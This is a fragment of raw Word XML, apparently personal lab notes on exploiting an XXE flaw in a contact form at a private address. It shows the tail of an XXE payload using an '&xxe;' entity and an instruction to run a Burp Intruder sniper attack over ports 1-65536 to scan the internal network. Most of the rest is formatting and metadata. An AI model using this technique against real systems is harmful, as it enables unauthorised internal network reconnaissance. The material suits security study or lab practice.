      <w:r w:rsidRPr="00F875FF">
        <w:t>]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDF9F39" w14:textId="77777777" w:rsidR="00F875FF" w:rsidRPr="00F875FF" w:rsidRDefault="00F875FF" w:rsidP="00F875FF">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00F875FF">
        <w:t>&lt;contact&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EC3376" w14:textId="77777777" w:rsidR="00F875FF" w:rsidRPr="00F875FF" w:rsidRDefault="00F875FF" w:rsidP="00F875FF">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00F875FF">
        <w:t xml:space="preserve">  &lt;name&gt;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F875FF">
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F875FF">
        <w:t>;&lt;/name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7F02F7" w14:textId="77777777" w:rsidR="00F875FF" w:rsidRPr="00F875FF" w:rsidRDefault="00F875FF" w:rsidP="00F875FF">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00F875FF">
        <w:t xml:space="preserve">  &lt;email&gt;test@test.com&lt;/email&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A1BA69" w14:textId="77777777" w:rsidR="00F875FF" w:rsidRPr="00F875FF" w:rsidRDefault="00F875FF" w:rsidP="00F875FF">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00F875FF">
        <w:t xml:space="preserve">  &lt;message&gt;test&lt;/message&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C793192" w14:textId="77777777" w:rsidR="00F875FF" w:rsidRPr="00F875FF" w:rsidRDefault="00F875FF" w:rsidP="00F875FF">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00F875FF">
        <w:t>&lt;/contact&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAF8386" w14:textId="77777777" w:rsidR="00F875FF" w:rsidRDefault="00F875FF" w:rsidP="00031256">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59FC0927" w14:textId="076CE15E" w:rsidR="00F875FF" w:rsidRDefault="00F875FF" w:rsidP="00031256">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Send the request to the intruder, sniper attack and numbers 1-65536 (scan internal network for open ports).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0235C67A" w14:textId="77777777" w:rsidR="00F875FF" w:rsidRDefault="00F875FF" w:rsidP="00031256">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="354C28DB" w14:textId="77777777" w:rsidR="00F875FF" w:rsidRPr="00F875FF" w:rsidRDefault="00F875FF" w:rsidP="00031256">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00F875FF" w:rsidRPr="00F87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35F3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C7F8E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E66FD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F044DFDE"/>
    <w:lvl w:ilvl="0" w:tplc="080E64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F06F4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F9C0C8F2"/>
    <w:lvl w:ilvl="0" w:tplc="F89AB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556202">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="547377890">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="189276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AD"/>
    <w:rsid w:val="00031256"/>
    <w:rsid w:val="0024341A"/>
    <w:rsid w:val="003206CD"/>
    <w:rsid w:val="003E28F2"/>
    <w:rsid w:val="00662B9B"/>
    <w:rsid w:val="00694B81"/>
    <w:rsid w:val="00710AC8"/>
    <w:rsid w:val="00712B0E"/>
    <w:rsid w:val="00975F86"/>
    <w:rsid w:val="00AA4FE3"/>
    <w:rsid w:val="00DC0E60"/>
    <w:rsid w:val="00EB2BAD"/>
    <w:rsid w:val="00F21CE2"/>
    <w:rsid w:val="00F875FF"/>
    <w:rsid w:val="00FA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22D1"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{12EEF445-07EA-4621-8A53-50D0A944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A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2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2B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B0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12B0E"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="glossary-term">
    <w:name w:val="glossary-term"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00712B0E"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AA4F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F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10.10.118.42/contact.ph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0.10.118.42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Talos Alexandru</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Talos Alexandru</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-04-26T05:09:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-04-26T06:20:00Z</dcterms:modified>
</cp:coreProperties>
</file>